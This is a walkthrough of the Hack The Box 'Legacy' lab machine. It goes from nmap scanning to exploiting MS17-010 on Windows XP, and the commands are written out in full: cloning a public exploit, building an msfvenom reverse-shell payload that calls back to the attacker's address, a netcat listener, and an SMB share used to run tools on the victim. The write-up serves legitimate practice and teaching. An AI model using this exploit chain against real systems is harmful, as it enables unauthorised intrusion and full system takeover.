Legacy – Hack The Box Walkthrough Without Metasploit

This is a walkthrough of the Legacy box from Hack The Box, done without using Metasploit.

1. Initial nmap scan

nmap -T4 -p- -A -Pn -oA initial_scan 10.10.10.4

• • Legacy box IP address is 10.10.10.4
  • -T4 = Sets the timing for scanning. The higher the number between 0-5 means it’s faster, however it’s also less accurate. T4 is the default
  • -p- = Port scan all ports
  • -A = Enables OS detection, version detection, script scanning, and traceroute
  • -oA = Output to a file I called “initial_scan”
  • -Pn = Disable host discovery. Port scan only (I was getting errors during my initial nmap scan that recommended adding this, so I did)

Ports 139, 445 and 3389 are open, and the OS is Windows XP.

 

2. Nmap vuln scan

nmap --script vuln -Pn -p 139,445 -oA vuln_scan 10.10.10.4

• • –script = Scan with default NSE scripts. Considered useful for discovery, and safe. I am searching for “vuln”
  • -p = Port scan for ports 139 and 445, the two ports I want to explore vulnerabilities on
  • I added -Pn again because of the ping errors from above

The victim box is vulnerable to two smb vulns: cve-2008-4250 (smb-vuln-ms08-067) and cve-2017-0143 (ms17-010).

 

3. Searchsploit

searchsploit ms17-010

• • Searchsploit = command-line search tool for Exploit-DB that is included in Kali. I’m using it to search for any exploits for ms17-010 that I can grab locally.
  • Anything ending in .rb will most likely be a Metasploit module so I skip those. I also don’t see anything that mentions Windows XP so I will head to Google to see what else I can find.

 

4. Google

• • This post mentioned where I could find an exploit for ms17-010 that would work with Windows XP:
    https://ivanitlearning.wordpress.com/2019/02/24/exploiting-ms17-010-without-metasploit-win-xp-sp3/
  • The article says the exploit can be found at https://github.com/helviojunior/MS17-010

 

5. Download exploit from github

git clone https://github.com/helviojunior/MS17-010

• • Navigate to ms17-010 directory on your box. The exploit we will be using is the send_and_execute.py exploit.
  • If you take a look at the script you can see at the top it needs to use libraries mysmb and impacket: https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py
• 
  • Install mysmb in that same ms17-010 directory. You can get it from: https://github.com/worawit/MS17-010/blob/master/mysmb.py
  • Install impacket in that directory as well. Git clone the repository from https://github.com/SecureAuthCorp/impacket then run: pip install impacket

git clone https://github.com/SecureAuthCorp/impacket

pip install impacket

• • Double check what your host IP address is by running ip addr
  • Since you are on the HTB vpn, your IP address will be the “tun0” (think “tunnel”)

 

6. Generate payload

• • Still in the MS17-010 directory, make the send_and_execute.py script executable:

chmod +x send_and_execute.py

• • In the same directory, create a reverse shell payload using msfvenom
    • Msfvenom is a command line instance of Metasploit that can be used to generate shellcode. We can use it here to generate our custom reverse shell payload, which we will then put into our exploit.
    • Note: Msfvenom is allowed on the OSCP exam. If you’re doing the OSCP exam, stick to standard reverse shell payloads, not Meterpreter ones. Meterpreter is forbidden on the OSCP exam.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o reverse-shell.exe

• • -p = payload (in this case it will be a windows reverse tcp shell)
    • A reverse shell (also known as a connect-back) requires the attacker to set up a listener first on their box. Then the victim machine acts as a client connecting to that listener, and then finally the attacker receives the shell.
  • LHOST = IP address of your host machine that will be doing the attack
  • LPORT = Any port you wish to assign to the listener (I try to stick to larger numbers)
  • EXITFUNC = Sets a function hash in the payload that specifies a DLL and function to call when the payload is complete.
    • There are 4 different values for EXITFUNC: none, seh, thread and process. Usually it is set to thread or process, which corresponds to the ExitThread or ExitProcess calls. “none” technique will calls GetLastError, effectively a no-op. The thread will then continue executing, allowing you to simply cat multiple payloads together to be run in serial.
    • EXITFUNC will be useful in some cases where after you exploited a box, you need a clean exit
      • SEH: This method should be used when there is a structured exception handler (SEH) that will restart the thread or process automatically when an error occurs.
      • THREAD: This method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit)
      • PROCESS: This method should be used with multi/handler. This method should also be used with any exploit where a master process restarts it on exit
  • -f = format (in our case exe)
  • -a = architecture
  • –platform = the platform of the payload
  • -o = output to a file (which I’ve named reverse-shell.exe)

 

7. Open up a netcat listener

• • In a new terminal window, open up a netcat listener for the victim machine to connect back to.
  • Use the same port that you set as the LPORT when you created your payload in the previous step. I used 4444

nc -nlvp 4444

 

8. Run the exploit and create a reverse shell on the victim box

python send_and_execute.py 10.10.10.4 reverse-shell.exe

• • send_and_execute.py = original script we downloaded from github
  • 10.10.10.4 = victim box
  • reverse-shell.exe is the payload we generated with msfvenom

Don’t worry about the “connection with remote host timed out” message. It should still be working. Back on your netcat listener terminal window, if everything has worked, you should see a reverse shell being created that gives you direct access to the victim box:

I tried running whoami on the victim box (this prints the username of the current user). Unfortunately, it did not work, so I will need to use the one I have on my own host machine.

 

9. Set up SMB server so victim box can access my own whoami.exe

• • In another terminal window I navigated to my root folder and searched for whoami.exe

locate whoami.exe

• • Then I searched for smbserver (comes on Kali by default)

locate smbserver

• • Make yourself root then run the smb server python script. In the below I started with “python” and then named the path smbserver.py was found in. Then I created a name for the share I wanted to make (legacytemp) and then I named the path that I wanted to share (in this case, the directory that whoami.exe is found in)

python /usr/share/doc/python3-impacket/examples/smbserver.py legacytemp /usr/share/windows-resources/binaries/

 

10. Execute whoami.exe and find flags

• • In the terminal window for your reverse shell, now access the share you created in step 9 and run whoami.exe
  • You will see you’re AUTHORITY\SYSTEM which is essentially root

\\10.10.14.21\legacytemp\whoami.exe

• • Navigate to C:\ and search for the directories that have the user and root flags files. Then open the files to grab the flags.

cd ..

dir user.txt

type user.txt

dir root.txt

type root.txt